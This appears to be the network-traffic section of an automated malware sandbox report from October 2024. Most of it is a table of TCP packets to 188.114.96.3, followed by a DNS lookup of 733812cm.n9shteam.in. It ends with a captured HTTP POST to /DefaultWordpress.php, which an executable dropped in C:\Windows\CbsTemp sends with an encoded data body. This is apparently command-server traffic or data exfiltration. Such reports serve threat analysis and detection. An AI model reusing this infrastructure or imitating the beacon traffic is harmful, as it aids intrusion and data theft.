                                                          Oct 20, 2024 18:19:32.938602924 CEST8050059188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:32.938683033 CEST8050059188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:33.056642056 CEST5006080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:33.061680079 CEST8050060188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:33.061691046 CEST8050060188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:33.061707973 CEST8050060188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:33.360723019 CEST8050059188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:33.449522018 CEST5005980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:33.488867998 CEST8050060188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:33.550298929 CEST5006080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:33.730639935 CEST8050059188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:33.788887978 CEST5005980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:33.861866951 CEST8050060188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:33.915828943 CEST5006080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:33.974685907 CEST5005980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:33.974819899 CEST5006080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:33.975703001 CEST5006180192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:33.980510950 CEST8050059188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:33.980530024 CEST8050060188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:33.980577946 CEST5005980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:33.980588913 CEST8050061188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:33.980609894 CEST5006080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:33.980655909 CEST5006180192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:33.980752945 CEST5006180192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:33.985510111 CEST8050061188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:34.337754965 CEST5006180192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:34.342979908 CEST8050061188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:34.343044996 CEST8050061188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:34.343054056 CEST8050061188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:34.788548946 CEST8050061188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:34.853313923 CEST5006180192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:35.158361912 CEST8050061188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:35.272113085 CEST5006180192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:35.273022890 CEST5006280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:35.277584076 CEST8050061188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:35.277686119 CEST5006180192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:35.277906895 CEST8050062188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:35.279699087 CEST5006280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:35.279772997 CEST5006280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:35.289166927 CEST8050062188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:35.634623051 CEST5006280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:35.639576912 CEST8050062188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:35.639589071 CEST8050062188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:35.639600992 CEST8050062188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:36.079098940 CEST8050062188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:36.118908882 CEST5006280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:36.308404922 CEST8050062188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:36.426923990 CEST5006380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:36.431797028 CEST8050063188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:36.431921005 CEST5006380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:36.436754942 CEST5006380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:36.442075014 CEST8050063188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:36.511698008 CEST5006280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:36.792088032 CEST5006380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:36.797028065 CEST8050063188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:36.797094107 CEST8050063188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:36.797103882 CEST8050063188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:37.224926949 CEST8050063188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:37.353264093 CEST5006380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:37.481861115 CEST8050063188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:37.481940985 CEST5006380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:37.591200113 CEST8050063188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:37.665744066 CEST5006380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:37.710505009 CEST5006280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:37.710678101 CEST5006380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:37.711110115 CEST5006480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:37.716209888 CEST8050063188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:37.716267109 CEST5006380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:37.716470957 CEST8050064188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:37.716536999 CEST5006480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:37.716609955 CEST5006480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:37.721438885 CEST8050064188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:38.072079897 CEST5006480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:38.077641010 CEST8050064188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:38.077657938 CEST8050064188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:38.077796936 CEST8050064188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:38.745183945 CEST5006580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:38.747435093 CEST5006480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:38.750354052 CEST8050065188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:38.750473976 CEST5006580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:38.750596046 CEST5006580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:38.755497932 CEST8050065188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:38.800211906 CEST8050064188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:38.867765903 CEST5006680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:38.872840881 CEST8050066188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:38.872968912 CEST5006680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:38.873116016 CEST5006680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:38.878072023 CEST8050066188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:38.895139933 CEST8050064188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:38.895236015 CEST5006480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:39.103277922 CEST5006580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:39.108248949 CEST8050065188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:39.108418941 CEST8050065188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:39.228308916 CEST5006680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:39.233172894 CEST8050066188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:39.233299017 CEST8050066188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:39.233659029 CEST8050066188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:39.576502085 CEST8050065188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:39.665734053 CEST5006580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:39.804928064 CEST8050065188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:39.853287935 CEST5006580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:40.928219080 CEST8050066188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:41.011022091 CEST5006680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:41.301553965 CEST8050066188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:41.415709972 CEST5006680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:41.431536913 CEST5006580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:41.431652069 CEST5006680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:41.432251930 CEST5006780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:41.436633110 CEST8050065188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:41.436676025 CEST5006580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:41.437148094 CEST8050066188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:41.437181950 CEST5006680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:41.437242985 CEST8050067188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:41.437298059 CEST5006780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:41.437392950 CEST5006780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:41.442346096 CEST8050067188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:41.790800095 CEST5006780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:41.919715881 CEST8050067188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:41.920031071 CEST8050067188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:41.920152903 CEST8050067188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:42.879352093 CEST8050067188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:42.965513945 CEST5006780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:43.257566929 CEST8050067188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:43.353200912 CEST5006780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:43.388149023 CEST5006780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:43.388647079 CEST5006880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:43.393920898 CEST8050067188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:43.393970013 CEST5006780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:43.394480944 CEST8050068188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:43.394546032 CEST5006880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:43.394727945 CEST5006880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:43.399589062 CEST8050068188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:43.743916035 CEST5006880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:43.751084089 CEST8050068188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:43.751095057 CEST8050068188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:43.751398087 CEST8050068188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:44.201756001 CEST8050068188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:44.355544090 CEST5006880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:44.597099066 CEST8050068188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:44.668320894 CEST5006880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:44.724751949 CEST5006880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:44.724761963 CEST5006980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:44.729743958 CEST8050069188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:44.729974985 CEST8050068188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:44.730070114 CEST5006880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:44.730076075 CEST5006980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:44.730155945 CEST5006980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:44.735163927 CEST8050069188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:44.807507038 CEST5007080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:44.812376022 CEST8050070188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:44.812477112 CEST5007080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:44.812553883 CEST5007080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:44.817548990 CEST8050070188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:45.087820053 CEST5006980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:45.092746973 CEST8050069188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:45.092786074 CEST8050069188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:45.092889071 CEST8050069188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:45.165764093 CEST5007080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:45.170742035 CEST8050070188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:45.170835972 CEST8050070188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:45.511482000 CEST8050069188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:45.600344896 CEST8050070188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:45.638401031 CEST5006980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:45.665669918 CEST5007080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:45.852332115 CEST8050070188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:45.853924990 CEST5006980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:45.859410048 CEST8050069188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:45.859463930 CEST5006980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:45.962538004 CEST5007080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:46.007520914 CEST5007080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:46.008506060 CEST5007180192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:46.013302088 CEST8050070188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:46.013350010 CEST5007080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:46.013938904 CEST8050071188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:46.014004946 CEST5007180192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:46.018698931 CEST5007280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:46.023658991 CEST8050072188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:46.023726940 CEST5007280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:46.023811102 CEST5007280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:46.029189110 CEST8050072188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:46.368858099 CEST5007280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:46.373794079 CEST8050072188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:46.373811007 CEST8050072188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:46.374466896 CEST8050072188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:46.821268082 CEST8050072188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:46.962542057 CEST5007280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:47.063595057 CEST8050072188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:47.167531013 CEST5007280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:47.193727016 CEST5007180192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:47.195791006 CEST5007280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:47.196397066 CEST5007380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:47.201108932 CEST8050072188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:47.201266050 CEST5007280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:47.201741934 CEST8050073188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:47.201889038 CEST5007380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:47.201951981 CEST5007380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:47.206792116 CEST8050073188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:47.556387901 CEST5007380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:47.561855078 CEST8050073188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:47.561867952 CEST8050073188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:47.561897993 CEST8050073188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:48.004616022 CEST8050073188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:48.119007111 CEST5007380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:48.786125898 CEST8050073188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:48.912686110 CEST5007480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:48.915646076 CEST5007380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:48.917666912 CEST8050074188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:48.917783022 CEST5007480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:48.917853117 CEST5007480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:48.923024893 CEST8050074188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:49.277443886 CEST5007480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:49.284754038 CEST8050074188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:49.285063028 CEST8050074188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:49.285916090 CEST8050074188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:49.694061995 CEST8050074188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:49.853159904 CEST5007480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:49.928862095 CEST8050074188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:50.052131891 CEST5007480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:50.052535057 CEST5007580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:50.057579041 CEST8050074188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:50.057636023 CEST5007480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:50.057878017 CEST8050075188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:50.057943106 CEST5007580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:50.058036089 CEST5007580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:50.063888073 CEST8050075188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:50.415762901 CEST5007580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:50.420787096 CEST8050075188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:50.420800924 CEST8050075188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:50.420808077 CEST8050075188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:50.831809998 CEST8050075188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:50.854392052 CEST5007580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:50.854396105 CEST5007680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:50.859538078 CEST8050076188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:50.859662056 CEST5007680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:50.859839916 CEST8050075188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:50.859874964 CEST5007680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:50.859911919 CEST5007580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:50.864839077 CEST8050076188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:50.977483988 CEST5007780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:50.977854013 CEST5007380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:50.982398033 CEST8050077188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:50.982480049 CEST5007780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:50.982585907 CEST5007780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:50.987687111 CEST8050077188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:51.212547064 CEST5007680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:51.217787981 CEST8050076188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:51.218364000 CEST8050076188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:51.340172052 CEST5007780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:51.345427990 CEST8050077188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:51.345453978 CEST8050077188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:51.345463037 CEST8050077188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:51.664496899 CEST8050076188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:51.712498903 CEST5007680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:51.786750078 CEST8050077188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:51.853111982 CEST5007780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:51.913064957 CEST8050076188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:52.009346008 CEST5007680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:52.014199972 CEST8050077188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:52.130633116 CEST5007680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:52.130695105 CEST5007780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:52.131247997 CEST5007880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:52.136301994 CEST8050076188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:52.136377096 CEST5007680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:52.136934042 CEST8050078188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:52.136998892 CEST5007880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:52.137092113 CEST5007880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:52.137511015 CEST8050077188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:52.137557983 CEST5007780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:52.142185926 CEST8050078188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:52.495462894 CEST5007880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:52.500490904 CEST8050078188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:52.500660896 CEST8050078188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:52.500695944 CEST8050078188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:53.147727013 CEST8050078188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:53.321837902 CEST5007880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:53.402476072 CEST8050078188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:53.531234026 CEST5007880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:53.531961918 CEST5007980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:53.537173033 CEST8050078188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:53.537215948 CEST5007880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:53.537333965 CEST8050079188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:53.537395954 CEST5007980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:53.537488937 CEST5007980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:53.542963982 CEST8050079188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:53.884363890 CEST5007980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:53.889440060 CEST8050079188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:53.889451981 CEST8050079188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:53.889461994 CEST8050079188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:54.304306984 CEST8050079188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:54.353096962 CEST5007980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:54.686629057 CEST8050079188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:54.805260897 CEST5007980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:54.808408022 CEST5008080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:54.810535908 CEST8050079188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:54.810646057 CEST5007980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:54.813210011 CEST8050080188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:54.813321114 CEST5008080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:54.813407898 CEST5008080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:54.818419933 CEST8050080188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:55.165651083 CEST5008080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:55.170779943 CEST8050080188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:55.170794010 CEST8050080188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:55.170802116 CEST8050080188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:56.106220961 CEST8050080188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:56.150166988 CEST5008080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:56.335443974 CEST8050080188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:56.462505102 CEST5008080192.168.2.5188.114.96.3

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Oct 20, 2024 18:17:53.939482927 CEST5207453192.168.2.51.1.1.1
                                                          Oct 20, 2024 18:17:53.954286098 CEST53520741.1.1.1192.168.2.5

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Oct 20, 2024 18:17:53.939482927 CEST192.168.2.51.1.1.10xd4d2Standard query (0)733812cm.n9shteam.inA (IP address)IN (0x0001)false

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Oct 20, 2024 18:17:53.954286098 CEST1.1.1.1192.168.2.50xd4d2No error (0)733812cm.n9shteam.in188.114.96.3A (IP address)IN (0x0001)false
                                                          Oct 20, 2024 18:17:53.954286098 CEST1.1.1.1192.168.2.50xd4d2No error (0)733812cm.n9shteam.in188.114.97.3A (IP address)IN (0x0001)false

                                                          HTTP Request Dependency Graph

                                                          • 733812cm.n9shteam.in

                                                          HTTP Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.549772188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:17:53.977781057 CEST310OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 344
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:17:54.325443029 CEST344OUTData Raw: 00 00 01 01 03 0d 01 0b 05 06 02 01 02 06 01 0a 00 01 05 0b 02 0d 03 00 07 03 0d 54 06 02 01 07 0a 02 06 00 07 06 06 01 0c 0a 05 06 07 57 06 04 07 04 0e 0b 0e 01 04 07 07 0e 06 0d 05 00 06 0a 00 05 0f 0e 04 0f 06 52 0c 53 0b 02 0d 56 0f 07 07 50
                                                          Data Ascii: TWRSVPUR\L~kcfOcbiwfP|RSc|w\h`sY{cJzpzJhToPvgRO~e~V@Bzm~LbW
